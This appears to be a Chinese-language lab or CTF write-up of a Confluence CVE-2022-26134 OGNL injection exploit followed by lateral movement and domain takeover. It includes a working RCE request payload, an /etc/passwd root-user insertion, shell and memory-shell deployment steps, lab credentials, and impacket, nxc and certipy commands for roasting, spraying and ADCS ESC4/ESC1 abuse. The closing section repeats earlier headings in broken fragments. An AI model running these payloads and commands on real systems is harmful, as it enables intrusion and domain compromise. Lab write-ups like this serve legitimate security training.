Confluence OGNL RCE (CVE-2022-26134) 漏洞利用与内网渗透实战<\/h1>

1. 目标环境概述<\/h2>

目标系统开放了以下端口：<\/p>

22 (SSH)<\/li>
3306 (MySQL)<\/li>
8090 (Confluence HTTP)<\/li>

8091 (备用HTTP)<\/li> <\/ul>

Confluence版本为7.13.6，存在CVE-2022-26134漏洞（OGNL表达式注入远程代码执行）。<\/p>

2. 漏洞验证与利用<\/h2>

2.1 漏洞验证<\/h3>

通过发送特殊构造的HTTP请求验证漏洞存在：<\/p>

GET<\/span> \/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D\/ HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 172.3.3.13:8090<\/span>
<\/span><\/span>Accept-Encoding:<\/span> gzip, deflate<\/span>
<\/span><\/span>Accept:<\/span> *\/*<\/span>
<\/span><\/span>Accept-Language:<\/span> en<\/span>
<\/span><\/span>User-Agent:<\/span> Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/97.0.4692.71 Safari\/537.36<\/span>
<\/span><\/span>Connection:<\/span> close<\/span>
<\/span><\/span><\/code><\/pre>2.2 获取权限的四种方法<\/h3>
方法一：上线Vshell<\/h4>

生成正向连接的客户端<\/li>
开启目标机器8877端口<\/li>
本地开启HTTP服务上传文件<\/li>
赋予可执行权限<\/li>
运行客户端实现上线<\/li>
<\/ol>
方法二：使用MSF直接上线<\/h4>
使用Metasploit框架的对应模块直接获取会话<\/p>
方法三：通过SSH添加用户<\/h4>

读取\/etc\/passwd文件<\/li>
添加用户到文件尾部（示例内容）：
r00t:x:0:0:root:\/root:\/bin\/bash
<\/code><\/pre>
<\/li>
上传修改后的文件<\/li>
使用添加的用户通过SSH连接<\/li>
<\/ol>
方法四：注入内存马<\/h4>
使用工具：CVE-2022-26134-Godzilla-MEMSHELL<\/a><\/p>
3. 内网信息收集<\/h2>
发现内网还有两台机器：<\/p>

10.10.10.5 (域控制器)<\/li>
10.10.10.66<\/li>
<\/ul>
4. Confluence后渗透<\/h2>
4.1 数据库访问<\/h3>

定位Confluence配置文件<\/li>
获取数据库凭据：

用户名：confluenceuser<\/li>
密码：confdsdgfd<\/li>
<\/ul>
<\/li>
<\/ol>
4.2 用户密码重置<\/h3>

将admin用户密码重置为123123<\/li>
爆破cslab用户密码得到123456<\/li>
访问cyberstrikelab空间成员表：http:\/\/172.3.3.13:8090\/display\/CYB\/cyberstrikelab<\/li>
<\/ol>
5. 域渗透攻击<\/h2>
5.1 AS-REQ Roasting攻击<\/h3>
使用impacket-GetNPUsers工具：<\/p>
impacket-GetNPUsers -dc-ip 10.10.10.5 -usersfile user.txt cyberstrike.lab\/ -no-pass
<\/span><\/span><\/code><\/pre>结果分析：<\/p>

大部分用户名不存在（KDC_ERR_C_PRINCIPAL_UNKNOWN错误）<\/li>
cslab用户存在但启用了预认证（未设置UF_DONT_REQUIRE_PREAUTH属性）<\/li>
<\/ul>
5.2 密码喷洒攻击<\/h3>
使用nxc工具爆破cslab用户密码：<\/p>
nxc smb 10.10.10.66 -u cslab -p <字典路径>
<\/span><\/span><\/code><\/pre>爆破结果：<\/p>

cslab用户密码：qwe!@#123<\/li>
本地管理员使用相同密码<\/li>
<\/ul>
5.3 获取SMB访问<\/h3>
使用impacket-smbexec连接：<\/p>
impacket-smbexec cslab:qwe!@#123@10.10.10.66
<\/span><\/span><\/code><\/pre>后续操作：<\/p>

开启3389端口<\/li>
添加新用户<\/li>
<\/ol>
6. ADCS-ESC4攻击<\/h2>
6.1 探测易受攻击的证书模板<\/h3>
使用certipy-ad工具：<\/p>
certipy-ad find -u 'cslab@cyberstrike.lab'<\/span> -p 'qwe!@#123'<\/span> -dc-ip 10.10.10.5 -vulnerable -stdout
<\/span><\/span><\/code><\/pre>权限分析：<\/p>

Full Control Principals: CYBERSTRIKE.LAB\Domain Admins和CYBERSTRIKE.LAB\Enterprise Admins<\/li>
Write Owner Principals: 同上<\/li>
Write Dacl Principals: 同上<\/li>
Write Property Enroll: 包含CYBERSTRIKE.LAB\Domain Computers<\/li>
<\/ul>
6.2 修改证书模板配置<\/h3>
certipy-ad template -u 'cslab@cyberstrike.lab'<\/span> -p 'qwe!@#123'<\/span> -dc-ip 10.10.10.5 -template 'DC'<\/span> -write-default-configuration
<\/span><\/span><\/code><\/pre>6.3 ADCS-ESC1攻击<\/h3>

修改hosts文件避免超时<\/li>
申请伪造证书：<\/li>
<\/ol>
certipy-ad req -u 'cslab@cyberstrike.lab'<\/span> -p 'qwe!@#123'<\/span> -target 10.10.10.5 -dc-ip 10.10.10.5 -ca 'cyberstrike-DC-CA'<\/span> -template 'DC'<\/span> -upn 'administrator@cyberstrike.lab'<\/span>
<\/span><\/span><\/code><\/pre>
获取administrator.pfx证书<\/li>
使用证书获取TGT和NTLM Hash<\/li>
进行Pass-the-Hash攻击获取域控权限<\/li>
<\/ol>
7. 关键工具与资源<\/h2>


Impacket工具集：<\/p>

GetNPUsers<\/li>
smbexec<\/li>
<\/ul>
<\/li>

Certipy-ad：<\/p>

用于AD CS证书服务攻击<\/li>
<\/ul>
<\/li>

内存马注入工具：<\/p>

CVE-2022-26134-Godzilla-MEMSHELL<\/a><\/li>
<\/ul>
<\/li>

参考文档：<\/p>

Confluence后渗透参考<\/a><\/li>
<\/ul>
<\/li>
<\/ol>

Confluence OGNL RCE (CVE-2022-26134) 漏洞利用与内网渗透实战<\/h1>

2. 漏洞验证与利用<\/h2>

2.2 获取权限的四种方法<\/h3>

方法二：使用MSF直接上线<\/h4> 使用Metasploit框架的对应模块直接获取会话<\/p>

方法四：注入内存马<\/h4> 使用工具：CVE-2022-26134-Godzilla-MEMSHELL<\/a><\/p>

3. 内网信息收集<\/h2> 发现内网还有两台机器：<\/p> 10.10.10.5 (域控制器)<\/li>

4. Confluence后渗透<\/h2>

4.1 数据库访问<\/h3> 定位Confluence配置文件<\/li>

5. 域渗透攻击<\/h2>

6. ADCS-ESC4攻击<\/h2>

方法二：使用MSF直接上线<\/h4>
使用Metasploit框架的对应模块直接获取会话<\/p>

方法四：注入内存马<\/h4>
使用工具：CVE-2022-26134-Godzilla-MEMSHELL<\/a><\/p>